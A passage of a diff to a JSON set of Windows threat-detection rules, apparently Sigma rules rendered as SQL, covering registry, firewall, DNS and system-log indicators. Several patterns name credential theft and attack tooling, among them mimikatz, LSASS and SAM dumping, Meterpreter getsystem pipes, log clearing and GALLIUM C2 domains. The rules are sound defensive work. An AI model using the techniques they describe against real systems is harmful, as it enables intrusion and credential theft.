content stored into registry keys as seen being used by UNC2452 group", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects when adversaries try to stop system services or processes by deleting their respective scheduled tasks in order to conduct data destructive activities", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.t1547.001" + "attack.impact", + "attack.t1489" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security') AND (EventType = 'SetValue' AND TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion%' ESCAPE '\\' AND (NewValue LIKE '%vbscript:%' ESCAPE '\\' OR NewValue LIKE '%jscript:%' ESCAPE '\\' OR NewValue LIKE '%mshtml,%' ESCAPE '\\' OR NewValue LIKE '%RunHTMLApplication%' ESCAPE '\\' OR NewValue LIKE '%Execute(%' ESCAPE '\\' OR NewValue LIKE '%CreateObject%' ESCAPE '\\' OR NewValue LIKE '%window.close%' ESCAPE '\\')) AND NOT ((TargetObject LIKE '%Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\') OR (NewProcessName LIKE '%\\\\msiexec.exe' ESCAPE '\\' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Installer\\\\UserData\\\\%' ESCAPE '\\' AND (NewValue LIKE '%\\\\Microsoft.NET\\\\Primary Interop Assemblies\\\\Microsoft.mshtml.dll%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,fileVersion=%' ESCAPE '\\' OR NewValue LIKE '%\\_mshtml\\_dll\\_%' ESCAPE '\\' OR NewValue LIKE '%<\\\\Microsoft.mshtml,culture=%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '141' AND (TaskName LIKE '%\\\\Windows\\\\SystemRestore\\\\SR%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\Windows Defender\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\BitLocker%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsBackup\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\WindowsUpdate\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\UpdateOrchestrator\\\\%' ESCAPE '\\' OR TaskName LIKE '%\\\\Windows\\\\ExploitGuard%' ESCAPE '\\')) AND NOT ((UserName LIKE '%AUTHORI%' ESCAPE '\\' OR UserName LIKE '%AUTORI%' ESCAPE '\\')))" ], - "filename": "registry_set_vbs_payload_stored.yml" + "filename": "win_taskscheduler_susp_schtasks_delete.yml" }, { - "title": "Disable Microsoft Office Security Features", - "id": "7c637634-c95d-4bbf-b26c-a82510874b34", + "title": "GALLIUM Artefacts - Builtin", + "id": "3db10f25-2527-4b79-8d4b-471eb900ee29", "status": "test", - "description": "Disable Microsoft Office Security Features by registry", - "author": "frack113", + "description": "Detects artefacts associated with activity group GALLIUM - Microsoft Threat Intelligence Center indicators released in December 2019.", + "author": "Tim Burrell", "tags": [ - "attack.defense_evasion", - "attack.t1562.001" + "attack.credential_access", + "attack.command_and_control", + "attack.t1071" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND (OperationType LIKE 'Existing registry value modified' ESCAPE '\\') AND Channel = 'Security' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Office\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%VBAWarnings' ESCAPE '\\' OR TargetObject LIKE '%DisableInternetFilesInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableUnsafeLocationsInPV' ESCAPE '\\' OR TargetObject LIKE '%DisableAttachementsInPV' ESCAPE '\\') AND NewValue = 'DWORD (0x00000001)')" + "SELECT * FROM logs WHERE (EventID = '257' AND QNAME IN ('asyspy256.ddns.net', 'hotkillmail9sddcc.ddns.net', 'rosaf112.ddns.net', 'cvdfhjh1231.myftp.biz', 'sz2016rose.ddns.net', 'dffwescwer4325.myftp.biz', 'cvdfhjh1231.ddns.net'))" ], - "filename": "registry_set_disable_microsoft_office_security_features.yml" + "filename": "win_dns_analytic_apt_gallium.yml" }, { - "title": "Disable Security Events Logging Adding Reg Key MiniNt", - "id": "919f2ef0-be2d-4a7a-b635-eb2b41fde044", - "status": "test", - "description": "Detects the addition of a key 'MiniNt' to the registry. Upon a reboot, Windows Event Log service will stopped write events.", - "author": "Ilyas Ochkov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" - ], + "title": "New Firewall Exception Rule Added For A Suspicious Folder", + "id": "9e2575e7-2cb9-4da1-adc8-ed94221dca5e", + "status": "experimental", + "description": "Detects the addition of a rule to the Windows Firewall exception list where the application resides in a suspicious folder", + "author": "frack113", "falsepositives": [ - "Unknown" + "Any legitimate application that runs from the AppData user directory" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\' AND EventType = 'CreateKey') OR NewName LIKE 'HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\MiniNt' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND ((EventID IN ('2004', '2071') AND (ApplicationPath LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR ApplicationPath LIKE '%\\\\Temp\\\\%' ESCAPE '\\')) AND NOT ((Action = '2'))) AND NOT ((ApplicationPath LIKE '%\\\\AppData\\\\local\\\\microsoft\\\\teams\\\\current\\\\teams.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Keybase\\\\keybase.exe' ESCAPE '\\') OR (ApplicationPath LIKE '%\\\\AppData\\\\Local\\\\Programs\\\\Messenger\\\\Messenger.exe' ESCAPE '\\')))" ], - "filename": "registry_event_disable_security_events_logging_adding_reg_key_minint.yml" + "filename": "win_firewall_as_add_rule_susp_folder.yml" }, { - "title": "PrinterNightmare Mimimkatz Driver Name", - "id": "ba6b9e43-1d45-4d3c-a504-1043a64c8469", - "status": "test", - "description": "Detects static QMS 810 and mimikatz driver name used by Mimikatz as exploited in CVE-2021-1675 and CVE-2021-34527", - "author": "Markus Neis, @markus_neis, Florian Roth", + "title": "All Rules Have Been Deleted From The Windows Firewall Configuration", + "id": "79609c82-a488-426e-abcf-9f341a39365d", + "status": "experimental", + "description": "Detects when a all the rules have been deleted from the Windows Defender Firewall configuration", + "author": "frack113, Nasreddine Bencherchali (Nextron Systems)", + "level": "high", + "rule": [ + "SELECT * FROM logs WHERE (Channel = 'Microsoft-Windows-Windows Firewall With Advanced Security/Firewall' AND (EventID IN ('2033', '2059') AND NOT (((ModifyingApplication LIKE 'C:\\\\Program Files\\\\%' ESCAPE '\\' OR ModifyingApplication LIKE 'C:\\\\Program Files (x86)\\\\%' ESCAPE '\\')) OR (ModifyingApplication LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\'))) AND NOT ((ModifyingApplication LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' AND ModifyingApplication LIKE '%\\\\MsMpEng.exe' ESCAPE '\\')))" + ], + "filename": "win_firewall_as_delete_all_rules.yml" + }, + { + "title": "Sysmon Crash", + "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "status": "experimental", + "description": "Detects application popup reporting a failure of the Sysmon service", + "author": "Tim Shelton", "tags": [ - "attack.execution", - "attack.t1204", - "cve.2021.1675", - "cve.2021.34527" + "attack.defense_evasion", + "attack.t1562" ], "falsepositives": [ - "Legitimate installation of printer driver QMS 810, Texas Instruments microLaser printer (unlikely)" + "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\QMS 810\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows x64\\\\Drivers\\\\Version-3\\\\mimikatz%' ESCAPE '\\') OR (TargetObject LIKE '%legitprinter%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments\\\\Windows%' ESCAPE '\\')) OR ((TargetObject LIKE '%\\\\Control\\\\Print\\\\Environments%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentVersion\\\\Print\\\\Printers%' ESCAPE '\\') AND (TargetObject LIKE '%Gentil Kiwi%' ESCAPE '\\' OR TargetObject LIKE '%mimikatz printer%' ESCAPE '\\' OR TargetObject LIKE '%Kiwi Legit Printer%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" ], - "filename": "registry_event_mimikatz_printernightmare.yml" + "filename": "win_system_application_sysmon_crash.yml" }, { - "title": "DLL Load via LSASS", - "id": "b3503044-60ce-4bf4-bbcb-e3db98788823", - "status": "test", - "description": "Detects a method to load DLL via LSASS process using an undocumented Registry key", - "author": "Florian Roth (Nextron Systems)", + "title": "Important Windows Eventlog Cleared", + "id": "100ef69e-3327-481c-8e5c-6d80d9507556", + "status": "experimental", + "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. caused by \"wevtutil cl\" command execution", + "author": "Florian Roth (Nextron Systems), Tim Shelton", "tags": [ - "attack.execution", - "attack.persistence", - "attack.t1547.008" + "attack.defense_evasion", + "attack.t1070.001", + "car.2016-04-002" ], "falsepositives": [ - "Unknown" + "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", + "System provisioning (system reset before the golden image creation)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\DirectoryServiceExtPt%' ESCAPE '\\' OR TargetObject LIKE '%\\\\CurrentControlSet\\\\Services\\\\NTDS\\\\LsaDbExtPt%' ESCAPE '\\') AND NOT ((NewProcessName LIKE 'C:\\\\Windows\\\\system32\\\\lsass.exe' ESCAPE '\\' AND (NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\ntdsa.dll' ESCAPE '\\' OR NewValue LIKE '\\%\\%systemroot\\%\\%\\\\system32\\\\lsadb.dll' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog' AND Channel IN ('System', 'Security', 'Application'))" ], - "filename": "registry_event_susp_lsass_dll_load.yml" + "filename": "win_system_susp_eventlog_cleared.yml" }, { - "title": "Shell Open Registry Keys Manipulation", - "id": "152f3630-77c1-4284-bcc0-4cc68ab2f6e7", + "title": "DHCP Server Loaded the CallOut DLL", + "id": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "status": "test", - "description": "Detects the shell open key manipulation (exefile and ms-settings) used for persistence and the pattern of UAC Bypass using fodhelper.exe, computerdefaults.exe, slui.exe via registry keys (e.g. UACMe 33 or 62)", - "author": "Christian Burkard (Nextron Systems)", + "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", + "author": "Dimitrios Slamaris", "tags": [ "attack.defense_evasion", - "attack.privilege_escalation", - "attack.t1548.002", - "attack.t1546.001" + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (((EventType = 'SetValue' AND TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\SymbolicLinkValue' ESCAPE '\\' AND NewValue LIKE '%\\\\Software\\\\Classes\\\\{%' ESCAPE '\\') OR TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\DelegateExecute' ESCAPE '\\') OR ((EventType = 'SetValue' AND (TargetObject LIKE '%Classes\\\\ms-settings\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\exefile\\\\shell\\\\open\\\\command\\\\(Default)' ESCAPE '\\')) AND NOT (NewValue = '(Empty)'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '1033' AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_shell_open_keys_manipulation.yml" + "filename": "win_system_susp_dhcp_config.yml" }, { - "title": "Creation of a Local Hidden User Account by Registry", - "id": "460479f3-80b7-42da-9c43-2cc1d54dbccd", - "status": "experimental", - "description": "Sysmon registry detection of a local hidden user account.", - "author": "Christian Burkard (Nextron Systems)", + "title": "DHCP Server Error Failed Loading the CallOut DLL", + "id": "75edd3fd-7146-48e5-9848-3013d7f0282c", + "status": "test", + "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", + "author": "Dimitrios Slamaris, @atc_project (fix)", "tags": [ - "attack.persistence", - "attack.t1136.001" + "attack.defense_evasion", + "attack.t1574.002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\SAM\\\\SAM\\\\Domains\\\\Account\\\\Users\\\\Names\\\\%' ESCAPE '\\' AND TargetObject LIKE '%$' ESCAPE '\\' AND NewProcessName LIKE '%\\\\lsass.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('1031', '1032', '1034') AND Provider_Name = 'Microsoft-Windows-DHCP-Server')" ], - "filename": "registry_event_add_local_hidden_user.yml" + "filename": "win_system_susp_dhcp_config_failed.yml" }, { - "title": "OilRig APT Registry Persistence", - "id": "7bdf2a7c-3acc-4091-9581-0a77dad1c5b5", + "title": "QuarksPwDump Clearing Access History", + "id": "39f919f3-980b-4e6f-a975-8af7e507ef2b", "status": "test", - "description": "Detects OilRig registry persistence as reported by Nyotron in their March 2018 report", - "author": "Florian Roth (Nextron Systems), Markus Neis, Jonhnathan Ribeiro, Daniil Yugoslavskiy, oscd.community", + "description": "Detects QuarksPwDump clearing access history in hive", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.g0049", - "attack.t1053.005", - "attack.s0111", - "attack.t1543.003", - "attack.defense_evasion", - "attack.t1112", - "attack.command_and_control", - "attack.t1071.004" + "attack.credential_access", + "attack.t1003.002" ], "falsepositives": [ - "Unlikely" + "Unknown" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND (TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UMe' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\UT' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '16' AND Provider_Name = 'Microsoft-Windows-Kernel-General' AND HiveName LIKE '%\\\\AppData\\\\Local\\\\Temp\\\\SAM%' ESCAPE '\\' AND HiveName LIKE '%.dmp' ESCAPE '\\')" ], - "filename": "registry_event_apt_oilrig_mar18.yml" + "filename": "win_system_quarkspwdump_clearing_hive_access_history.yml" }, { - "title": "Potential Credential Dumping Via LSASS SilentProcessExit Technique", - "id": "55e29995-75e7-451a-bef0-6225e2f13597", - "status": "experimental", - "description": "Detects changes to the Registry in which a monitor program gets registered to dump the memory of the lsass.exe process", - "author": "Florian Roth (Nextron Systems)", + "title": "Zerologon Exploitation Using Well-known Tools", + "id": "18f37338-b9bd-4117-a039-280c81f7a596", + "status": "stable", + "description": "This rule is designed to detect attempts to exploit Zerologon (CVE-2020-1472) vulnerability using mimikatz zerologon module or other exploits from machine with \"kali\" hostname.", + "author": "Demyan Sokolin @_drd0c, Teymur Kheirkhabarov @HeirhabarovT, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003.001" - ], - "falsepositives": [ - "Unlikely" + "attack.t1210", + "attack.lateral_movement" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Microsoft\\\\Windows NT\\\\CurrentVersion\\\\SilentProcessExit\\\\lsass.exe%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID IN ('5805', '5723') AND (logs MATCH ('\"kali\" OR \"mimikatz\"')))" ], - "filename": "registry_event_silentprocessexit_lsass.yml" + "filename": "win_system_possible_zerologon_exploitation_using_wellknown_tools.yml" }, { - "title": "Windows Credential Editor Registry", - "id": "a6b33c02-8305-488f-8585-03cb2a7763f2", + "title": "Vulnerable Netlogon Secure Channel Connection Allowed", + "id": "a0cb7110-edf0-47a4-9177-541a4083128a", "status": "test", - "description": "Detects the use of Windows Credential Editor (WCE)", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects that a vulnerable Netlogon secure channel connection was allowed, which could be an indicator of CVE-2020-1472.", + "author": "NVISO", "tags": [ - "attack.credential_access", - "attack.t1003.001", - "attack.s0005" + "attack.privilege_escalation", + "attack.t1548" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%Services\\\\WCESERVICE\\\\Start%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'NetLogon' AND EventID = '5829')" ], - "filename": "registry_event_hack_wce_reg.yml" + "filename": "win_system_vul_cve_2020_1472.yml" }, { - "title": "Suspicious Camera and Microphone Access", - "id": "62120148-6b7a-42be-8b91-271c04e281a3", - "status": "test", - "description": "Detects Processes accessing the camera and microphone from suspicious folder", - "author": "Den Iuzvyk", + "title": "KDC RC4-HMAC Downgrade CVE-2022-37966", + "id": "e6f81941-b1cd-4766-87db-9fc156f658ee", + "status": "experimental", + "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.collection", - "attack.t1125", - "attack.t1123" + "attack.privilege_escalation" ], "falsepositives": [ - "Unlikely, there could be conferencing software running from a Temp folder accessing the devices" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\CapabilityAccessManager\\\\ConsentStore\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\NonPackaged%' ESCAPE '\\' AND (TargetObject LIKE '%microphone%' ESCAPE '\\' OR TargetObject LIKE '%webcam%' ESCAPE '\\') AND (TargetObject LIKE '%:#Windows#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#$Recycle.bin#%' ESCAPE '\\' OR TargetObject LIKE '%:#Temp#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Public#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Default#%' ESCAPE '\\' OR TargetObject LIKE '%:#Users#Desktop#%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND EventID = '42' AND Provider_Name = 'Kerberos-Key-Distribution-Center' AND Level = '2')" ], - "filename": "registry_event_susp_mic_cam_access.yml" + "filename": "win_system_kdcsvc_rc4_downgrade.yml" }, { - "title": "NetNTLM Downgrade Attack - Registry", - "id": "d67572a0-e2ec-45d6-b8db-c100d14b8ef2", + "title": "NTFS Vulnerability Exploitation", + "id": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "status": "test", - "description": "Detects NetNTLM downgrade attack", - "author": "Florian Roth (Nextron Systems), wagga", + "description": "This the exploitation of a NTFS vulnerability as reported without many details via Twitter", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1562.001", - "attack.t1112" + "attack.impact", + "attack.t1499.001" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%SYSTEM\\\\%' ESCAPE '\\' AND TargetObject LIKE '%ControlSet%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Control\\\\Lsa%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\lmcompatibilitylevel' ESCAPE '\\' OR TargetObject LIKE '%\\\\NtlmMinClientSec' ESCAPE '\\' OR TargetObject LIKE '%\\\\RestrictSendingNTLMTraffic' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Ntfs' AND EventID = '55' AND Origin = 'File System Driver' AND Description LIKE '%contains a corrupted file record%' ESCAPE '\\' AND Description LIKE '%The name of the file is \"\\\\\"%' ESCAPE '\\')" ], - "filename": "registry_event_net_ntlm_downgrade.yml" + "filename": "win_system_ntfs_vuln_exploit.yml" }, { - "title": "FlowCloud Malware", - "id": "5118765f-6657-4ddb-a487-d7bd673abbf1", - "status": "test", - "description": "Detects FlowCloud malware from threat group TA410.", - "author": "NVISO", + "title": "Local Privilege Escalation Indicator TabTip", + "id": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", + "status": "experimental", + "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.persistence", - "attack.t1112" + "attack.execution", + "attack.t1557.001" ], "falsepositives": [ "Unknown" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND ((TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{804423C2-F490-4ac3-BFA5-13DEDE63A71A}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{A5124AF5-DF23-49bf-B0ED-A18ED3DEA027}' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\HARDWARE\\\\{2DB80286-1784-48b5-A751-B6ED1F490303}' ESCAPE '\\') OR TargetObject LIKE 'HKLM\\\\SYSTEM\\\\Setup\\\\PrintResponsor\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Microsoft-Windows-DistributedCOM' AND EventID = '10001' AND param1 LIKE 'C:\\\\Program Files\\\\Common Files\\\\microsoft shared\\\\ink\\\\TabTip.exe' ESCAPE '\\' AND param2 = '2147943140' AND param3 = '{054AAE20-4BEA-4347-8A35-64A533254A9D}')" ], - "filename": "registry_event_mal_flowcloud.yml" + "filename": "win_system_lpe_indicators_tabtip.yml" }, { - "title": "Potential Qakbot Registry Activity", - "id": "1c8e96cd-2bed-487d-9de0-b46c90cade56", + "title": "Service Installed By Unusual Client - System", + "id": "71c276aa-49cd-43d2-b920-2dcd3e6962d5", "status": "experimental", - "description": "Detects a registry key used by IceID in a campaign that distributes malicious OneNote files", - "author": "Hieu Tran", + "description": "Detects a service installed by a client which has PID 0 or whose parent has PID 0", + "author": "Tim Rauch", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1543" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security' AND TargetObject LIKE '%\\\\Software\\\\firm\\\\soft\\\\Name' ESCAPE '\\')" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ProcessId = '0')" ], - "filename": "registry_event_malware_qakbot_registry.yml" + "filename": "win_system_system_service_installation_by_unusal_client.yml" }, { - "title": "Esentutl Volume Shadow Copy Service Keys", - "id": "5aad0995-46ab-41bd-a9ff-724f41114971", - "status": "test", - "description": "Detects the volume shadow copy service initialization and processing via esentutl. Registry keys such as HKLM\\\\System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Diag\\\\VolSnap\\\\Volume are captured.", - "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", + "title": "Moriya Rootkit - System", + "id": "25b9c01c-350d-4b95-bed1-836d04a4f324", + "status": "experimental", + "description": "Detects the use of Moriya rootkit as described in the securelist's Operation TunnelSnake report", + "author": "Bhabesh Raj", "tags": [ - "attack.credential_access", - "attack.t1003.002" + "attack.persistence", + "attack.privilege_escalation", + "attack.t1543.003" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS%' ESCAPE '\\' AND NewProcessName LIKE '%esentutl.exe' ESCAPE '\\') AND NOT (TargetObject LIKE '%System\\\\CurrentControlSet\\\\Services\\\\VSS\\\\Start%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'ZzNetSvc')" ], - "filename": "registry_event_esentutl_volume_shadow_copy_service_keys.yml" + "filename": "win_system_moriya_rootkit.yml" }, { - "title": "OceanLotus Registry Activity", - "id": "4ac5fc44-a601-4c06-955b-309df8c4e9d4", - "status": "test", - "description": "Detects registry keys created in OceanLotus (also known as APT32) attacks", - "author": "megan201296, Jonhnathan Ribeiro", + "title": "Meterpreter or Cobalt Strike Getsystem Service Installation - System", + "id": "843544a7-56e0-4dcc-a44f-5cc266dd97d6", + "status": "experimental", + "description": "Detects the use of getsystem Meterpreter/Cobalt Strike command by detecting a specific service installation", + "author": "Teymur Kheirkhabarov, Ecco, Florian Roth", "tags": [ - "attack.defense_evasion", - "attack.t1112" + "attack.privilege_escalation", + "attack.t1134.001", + "attack.t1134.002" ], "falsepositives": [ - "Unknown" + "Highly unlikely" ], "level": "critical", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '4657' AND OperationType IN ('New registry value created', 'Existing registry value modified') AND Channel = 'Security') AND (TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model' ESCAPE '\\' OR ((TargetObject LIKE 'HKCU\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\' OR TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\App\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%AppXbf13d4ea2945444d8b13e2121cb6b663\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX70162486c7554f7f80f481985d67586d\\\\%' ESCAPE '\\' OR TargetObject LIKE '%AppX37cc7fdccd644b4f85f4b22d5a3f105a\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%Application' ESCAPE '\\' OR TargetObject LIKE '%DefaultIcon' ESCAPE '\\')) OR (TargetObject LIKE 'HKCU\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%Classes\\\\AppXc52346ec40fb4061ad96be0e6cb7d16a\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\AppX3bbba44c6cae4d9695755183472171e2\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E3517E26-8E93-458D-A6DF-8030BC80528B}\\\\%' ESCAPE '\\' OR TargetObject LIKE '%Classes\\\\CLSID\\\\{E08A0F4B-1F65-4D4D-9A09-BD4625B9C5A1}\\\\Model%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND ((ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%\\%COMSPEC\\%%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%cmd.exe%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%echo%' ESCAPE '\\' AND ImagePath LIKE '%\\\\pipe\\\\%' ESCAPE '\\') OR (ImagePath LIKE '%rundll32%' ESCAPE '\\' AND ImagePath LIKE '%.dll,a%' ESCAPE '\\' AND ImagePath LIKE '%/p:%' ESCAPE '\\') OR ImagePath LIKE '\\\\\\\\127.0.0.1\\\\ADMIN$\\\\%' ESCAPE '\\'))" ], - "filename": "registry_event_apt_oceanlotus_registry.yml" + "filename": "win_system_meterpreter_or_cobaltstrike_getsystem_service_installation.yml" }, { - "title": "Suspicious Run Key from Download", - "id": "9c5037d1-c568-49b3-88c7-9846a5bdc2be", - "status": "test", - "description": "Detects the suspicious RUN keys created by software located in Download or temporary Outlook/Internet Explorer directories", - "author": "Florian Roth 